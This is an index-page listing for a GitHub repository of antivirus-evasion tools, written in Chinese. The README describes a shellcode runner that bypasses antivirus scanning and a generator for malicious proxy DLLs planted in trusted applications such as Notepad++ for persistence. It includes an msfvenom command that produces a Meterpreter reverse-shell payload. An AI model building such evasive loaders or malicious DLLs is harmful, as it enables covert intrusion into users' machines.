Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/akkuman/toolset
免杀小小工具集
https://github.com/akkuman/toolset
Last synced: 3 months ago
JSON representation
免杀小小工具集
- Host: GitHub
- URL: https://github.com/akkuman/toolset
- Owner: akkuman
- Created: 2021-10-20T09:13:39.000Z (about 3 years ago)
- Default Branch: master
- Last Pushed: 2022-08-08T02:34:42.000Z (about 2 years ago)
- Last Synced: 2024-05-13T16:34:04.371Z (6 months ago)
- Language: Go
- Size: 5.85 MB
- Stars: 108
- Watchers: 5
- Forks: 17
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - akkuman/toolset - 免杀小小工具集 (Go)
README
# ToolSet
一个小小的工具集
**目前已经查杀,后续再更新**
## 安装
```shell
curl -o docker-compose.yml https://raw.githubusercontent.com/akkuman/toolset/master/docker-compose.yml
sudo docker-compose pull && sudo docker-compose up -d
```访问 `http://127.0.0.1:8080/swagger/index.html` 即可查看接口文档
## 工具列表
### ShellcodeRunner
#### 介绍
一个shellcode包装器,可根据提供的shellcode raw[`msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f raw > ~/shell.raw`]文件
生成免杀的执行器#### 国际惯例
![ShellcodeRunner静态bypass.webp](pics/ShellcodeRunner-static-bypassAV.webp)
![ShellcodeRunner动态bypass.webp](pics/ShellcodeRunner-dynamic-bypassAV.webp)##### 云查杀测试
一天过去了,还能冲,应该bypass了云查杀
![一天后冲图.webp](pics/ShellcodeRunner-static-rescan-after-one-day.webp)
### DllProxyer
#### 介绍
依旧是一个shellcode包装器,但是关注点不同,此工具根据用户所提供的dll和shellcode,生成一个恶意转发dll
##### 用途和场景
一般可用在一些维权和白利用的场景上,比如目标用户使用 notepad++ 频率较高,则我们可以把 notepad++ 里面的某个插件的dll取出来做成恶意dll放入